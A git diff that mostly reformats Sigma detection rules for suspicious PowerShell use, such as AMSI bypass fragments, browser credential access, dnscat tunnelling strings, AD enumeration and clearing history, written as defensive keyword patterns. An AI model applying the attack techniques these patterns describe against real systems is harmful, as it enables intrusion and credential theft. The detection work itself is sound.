https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1 - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml index 1ad10cf95..87d77e636 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml @@ -1,16 +1,10 @@ title: Suspicious Get Information for SMB Share - PowerShell Module id: 6942bd25-5970-40ab-af49-944247103358 status: test -description: 'Adversaries may look for folders and drives shared on remote systems - as a means of identifying sources of information to gather as a precursor for - Collection and - +description: | + Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. - - Networks often contain shared network drives and folders that enable users to - access file directories on various systems across a network. - - ' + Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md author: frack113 @@ -30,8 +24,8 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: - - Payload|contains: get-smbshare - - ContextInfo|contains: get-smbshare + - Payload|contains: get-smbshare + - ContextInfo|contains: get-smbshare condition: ps_module and selection falsepositives: - Administrator script diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml index 6516ab856..2e0755f0c 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml @@ -1,22 +1,16 @@ title: Zip A Folder With PowerShell For Staging In Temp - PowerShell Module -id: daf7eb81-35fd-410d-9d7a-657837e602bb +id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module related: - - id: 71ff406e-b633-4989-96ec-bc49d825a412 - type: similar - - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 - type: similar - - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 - type: similar + - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic + type: similar + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script + type: similar + - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml b/sigma/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml index c9f461c8c..de0726ff2 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml @@ -1,16 +1,15 @@ title: SyncAppvPublishingServer Bypass Powershell Restriction - PS Module id: fe5ce7eb-dad8-467c-84a9-31ec23bd644a related: - - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: derived - - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 - type: derived + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived + - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 + type: derived status: test -description: Detects SyncAppvPublishingServer process execution which usually utilized - by adversaries to bypass PowerShell execution restrictions. +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ -author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community" +author: Ensar Şamil, @sblmsrsn, OSCD Community date: 2020/10/05 modified: 2022/12/02 tags: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml b/sigma/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml index 62d7ba826..d60a653b3 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml @@ -1,12 +1,10 @@ title: AADInternals PowerShell Cmdlets Execution - PsScript id: 91e69562-2426-42ce-a647-711b8152ced6 related: - - id: c86500e9-a645-4680-98d7-f882c70c1ea3 - type: similar + - id: c86500e9-a645-4680-98d7-f882c70c1ea3 + type: similar status: test -description: Detects ADDInternals Cmdlet execution. A tool for administering Azure - AD and Office 365. Which can be abused by threat actors to attack Azure AD or - Office 365. +description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. references: - https://o365blog.com/aadinternals/ - https://github.com/Gerenios/AADInternals @@ -30,6 +28,7 @@ detection: - PowerShellCore/Operational selection: ScriptBlockText|contains: + # Since most of the cmdlets use a unique enough string which is "-AADInt" we only used that portion. For a complete list please check the references linked above - Add-AADInt - ConvertTo-AADInt - Disable-AADInt diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml b/sigma/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml index cdd08b207..d242d2ce7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml @@ -1,21 +1,15 @@ title: Access to Browser Login Data id: fc028194-969d-4122-8abe-0470d5b8f12f related: - - id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d - type: obsoletes - - id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b - type: similar + - id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d + type: obsoletes + - id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b + type: similar status: test -description: 'Adversaries may acquire credentials from web browsers by reading files - specific to the target browser. - - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. - - Web browsers typically store the credentials in an encrypted format within a credential - store. - - ' +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml b/sigma/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml index 887586583..5b7743689 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml @@ -1,13 +1,12 @@ title: Potential Active Directory Enumeration Using AD Module - PsScript id: 9e620995-f2d8-4630-8430-4afd89f77604 related: - - id: 70bc5215-526f-4477-963c-a47a5c9ebd12 - type: similar - - id: 74176142-4684-4d8a-8b0a-713257e7df8e - type: similar + - id: 70bc5215-526f-4477-963c-a47a5c9ebd12 + type: similar + - id: 74176142-4684-4d8a-8b0a-713257e7df8e + type: similar status: test -description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" - DLL. Which is often used by attackers to perform AD enumeration. +description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. references: - https://github.com/samratashok/ADModule - https://twitter.com/cyb3rops/status/1617108657166061568?s=20 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/sigma/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 64ae7f308..8179b3f66 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -1,13 +1,9 @@ title: Powershell Add Name Resolution Policy Table Rule id: 4368354e-1797-463c-bc39-a309effbe8d7 status: test -description: 'Detects powershell scripts that adds a Name Resolution Policy Table - (NRPT) rule for the specified namespace. - - This will bypass the default DNS server and uses a specified server for answering - the query. - - ' +description: | + Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. + This will bypass the default DNS server and uses a specified server for answering the query. references: - https://twitter.com/NathanMcNulty/status/1569497348841287681 - https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml b/sigma/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml index 1a7519fe0..23d964943 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml @@ -1,11 +1,10 @@ title: Add Windows Capability Via PowerShell Script id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 related: - - id: b36d01a3-ddaf-4804-be18-18a6247adfcd - type: similar + - id: b36d01a3-ddaf-4804-be18-18a6247adfcd + type: similar status: experimental -description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. - Notable capabilities could be "OpenSSH" and others. +description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. references: - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content @@ -27,10 +26,9 @@ detection: selection_cmdlet: ScriptBlockText|contains: 'Add-WindowsCapability ' selection_capa: - ScriptBlockText|contains: -Name OpenSSH. + ScriptBlockText|contains: -Name OpenSSH. # For both "OpenSSH.Server" and "OpenSSH.Client" condition: ps_script and (all of selection_*) falsepositives: - - Legitimate usage of the capabilities by administrators or users. Add additional - filters accordingly. + - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml b/sigma/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml index 83f799e2c..c3b02a030 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml @@ -1,8 +1,7 @@ title: PowerShell ADRecon Execution id: bf72941a-cba0-41ea-b18c-9aca3925690d status: test -description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been - reported to be actively used by FIN7 +description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7 references: - https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1 - https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319 @@ -28,7 +27,7 @@ detection: - Function Get-ADRExcelComOb - Get-ADRGPO - Get-ADRDomainController - - ADRecon-Report.xlsx + - ADRecon-Report.xlsx # Default condition: ps_script and selection falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml b/sigma/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml index 39985cf62..6d1336744 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml @@ -1,8 +1,7 @@ title: AMSI Bypass Pattern Assembly GetType id: e0d6c087-2d1c-47fd-8799-3904103c5a98 status: test -description: Detects code fragments found in small and obfuscated AMSI bypass PowerShell - scripts +description: Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts references: - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ - https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml b/sigma/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml index e4c294d49..13a5997f7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml @@ -1,11 +1,10 @@ title: Potential AMSI Bypass Script Using NULL Bits id: fa2559c8-1197-471d-9cdd-05a0273d4522 related: - - id: 92a974db-ab84-457f-9ec0-55db83d7a825 - type: similar + - id: 92a974db-ab84-457f-9ec0-55db83d7a825 + type: similar status: experimental -description: Detects usage of special strings/null bits in order to potentially bypass - AMSI functionalities +description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities references: - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml b/sigma/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml index 8e1c4dd21..58a5d2c06 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml @@ -28,6 +28,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational empire: + # better to randomise the order ScriptBlockText|contains|all: - System.Diagnostics.Process - Stop-Computer @@ -36,6 +37,7 @@ detection: - $cmdargs - Close-Dnscat2Tunnel dnscat: + # better to randomise the order ScriptBlockText|contains|all: - set type=$LookupType`nserver - $Command | nslookup 2>&1 | Out-String diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml b/sigma/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml index 1fe172f8d..166ddda94 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml @@ -1,8 +1,7 @@ title: Get-ADUser Enumeration Using UserAccountControl Flags id: 96c982fe-3d08-4df4-bed2-eb14e02f21c8 status: test -description: Detects AS-REP roasting is an attack that is often-overlooked. It is - not very common as you have to explicitly set accounts that do not require pre-authentication. +description: Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting - https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/ @@ -22,6 +21,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: + # 4194304 DONT_REQ_PREAUTH ScriptBlockText|contains|all: - Get-ADUser - -Filter diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml b/sigma/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml index 2202803bb..3033bccd0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml @@ -25,6 +25,8 @@ detection: - BinaryWriter selection_header_wav: ScriptBlockText|contains|all: + # Byte chunks from the WAV header used in the example POC + # You can extend this for different audio formats by adding different selections - '0x52' - '0x49' - '0x46' diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_automated_collection.yml b/sigma/builtin/powershell/powershell_script/posh_ps_automated_collection.yml index 7592e6092..e4630504c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_automated_collection.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_automated_collection.yml @@ -1,8 +1,7 @@ title: Automated Collection Command PowerShell id: c1dda054-d638-4c16-afc8-53e007f3fbc5 status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data. +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml b/sigma/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml index a03f9fb4c..3c1b9e7f9 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml @@ -1,13 +1,9 @@ title: Windows Screen Capture with CopyFromScreen id: d4a11f63-2390-411c-9adf-d791fd152830 status: test -description: 'Adversaries may attempt to take screen captures of the desktop to gather - information over the course of an operation. - - Screen capturing functionality may be included as a feature of a remote access - tool used in post-compromise operations - - ' +description: | + Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. + Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml b/sigma/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml index d04eeb73a..cda14fb97 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml @@ -1,8 +1,8 @@ title: Clear PowerShell History - PowerShell id: 26b692dc-1722-49b2-b496-a8258aa6371d related: - - id: dfba4ce1-e0ea-495f-986e-97140f31af2d - type: derived + - id: dfba4ce1-e0ea-495f-986e-97140f31af2d + type: derived status: test description: Detects keywords that could indicate clearing PowerShell history references: @@ -33,7 +33,7 @@ detection: selection_2: ScriptBlockText|contains|all: - Set-PSReadlineOption - - "\u2013HistorySaveStyle" + - –HistorySaveStyle # not sure if the homoglyph –/- is intended, just checking for both - SaveNothing selection_3: ScriptBlockText|contains|all: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml b/sigma/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml index 1cace907f..a018b489e 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml @@ -1,9 +1,7 @@ title: Clearing Windows Console History id: bde47d4b-9987-405c-94c7-b080410e8ea7 status: test -description: Identifies when a user attempts to clear console history. An adversary - may clear the command history of a compromised account to conceal the actions - undertaken during an intrusion. +description: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. references: - https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/ - https://www.shellhacks.com/clear-history-powershell/ diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml b/sigma/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml index 6bc2506c6..1d6120c2f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml @@ -1,8 +1,7 @@ title: Powershell Create Scheduled Task id: 363eccc0-279a-4ccf-a3ab-24c2e63b11fb status: test -description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling - for initial or recurring execution of malicious code +description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml b/sigma/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml index 486493732..0e8c96512 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml @@ -1,11 +1,10 @@ title: Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell id: db885529-903f-4c5d-9864-28fe199e6370 related: - - id: 435e10e4-992a-4281-96f3-38b11106adde - type: similar + - id: 435e10e4-992a-4281-96f3-38b11106adde + type: similar status: test -description: Detects usage of the Get-ADComputer cmdlet to collect computer information - and output it to a file +description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -36,7 +35,6 @@ detection: - Add-Content condition: ps_script and selection falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml b/sigma/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml index 045f8acf2..b35dc6925 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml @@ -1,8 +1,7 @@ title: Powershell Install a DLL in System Directory id: 63bf8794-9917-45bc-88dd-e1b5abc0ecfd status: test -description: Uses PowerShell to install/copy a a file into a system directory such - as "System32" or "SysWOW64" +description: Uses PowerShell to install/copy a a file into a system directory such as "System32" or "SysWOW64" references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll author: frack113, Nasreddine Bencherchali diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml b/sigma/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml index 1b292c263..9532f2f9f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml @@ -1,21 +1,12 @@ title: Registry-Free Process Scope COR_PROFILER id: 23590215-4702-4a70-8805-8dc9e58314a2 status: test -description: 'Adversaries may leverage the COR_PROFILER environment variable to hijack - the execution flow of programs that load the .NET CLR. - - The COR_PROFILER is a .NET Framework feature which allows developers to specify - an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process - that loads the Common Language Runtime (CLR). - - These profiliers are designed to monitor, troubleshoot, and debug managed code - executed by the .NET CLR. - +description: | + Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. + The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). + These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) - (Citation: Microsoft COR_PROFILER Feb 2013) - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml b/sigma/builtin/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml index 7645db865..5b1c2ea65 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml @@ -1,8 +1,7 @@ title: Create Volume Shadow Copy with Powershell id: afd12fed-b0ec-45c9-a13d-aa86625dac81 status: test -description: Adversaries may attempt to access or create a copy of the Active Directory - domain database in order to steal credential information +description: Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information references: - https://attack.mitre.org/datasources/DS0005/ - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml b/sigma/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml index 1c6d0284d..1d29a055d 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml @@ -1,13 +1,9 @@ title: Powershell Detect Virtualization Environment id: d93129cd-1ee0-479f-bc03-ca6f129882e3 status: test -description: 'Adversaries may employ various system checks to detect and avoid virtualization - and analysis environments. - - This may include changing behaviors based on the results of checks for the presence - of artifacts indicative of a virtual machine environment (VME) or sandbox - - ' +description: | + Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. + This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md - https://techgenix.com/malicious-powershell-scripts-evade-detection/ diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml b/sigma/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml index aed2ba886..aa7f32aa7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml @@ -1,8 +1,7 @@ title: DirectorySearcher Powershell Exploitation id: 1f6399cf-2c80-4924-ace1-6fcff3393480 status: test -description: Enumerates Active Directory to determine computers that are joined to - the domain +description: Enumerates Active Directory to determine computers that are joined to the domain references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml b/sigma/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml index 2e474d24a..40ce174e4 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml @@ -1,14 +1,9 @@ title: Manipulation of User Computer or Group Security Principals Across AD id: b29a93fb-087c-4b5b-a84d-ee3309e69d08 status: test -description: 'Adversaries may create a domain account to maintain access to victim - systems. - - Domain accounts are those managed by Active Directory Domain Services where access - and permissions are configured across systems and services that are part of that - domain.. - - ' +description: | + Adversaries may create a domain account to maintain access to victim systems. + Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain.. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell - https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml b/sigma/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml index 7ef3a0123..2e8988cd7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml @@ -1,8 +1,7 @@ title: Disable Powershell Command History id: 602f5669-6927-4688-84db-0d4b7afb2150 status: test -description: Detects scripts or commands that disabled the Powershell command history - by removing psreadline module +description: Detects scripts or commands that disabled the Powershell command history by removing psreadline module references: - https://twitter.com/DissectMalware/status/1062879286749773824 author: Ali Alwashali diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml b/sigma/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml index e228eadec..e850e3d13 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml @@ -1,13 +1,9 @@ title: Disable-WindowsOptionalFeature Command PowerShell id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 status: test -description: 'Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment - Image Servicing and Management tool. - - Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, - and update features and packages in Windows images - - ' +description: | + Detect built in PowerShell cmdlet 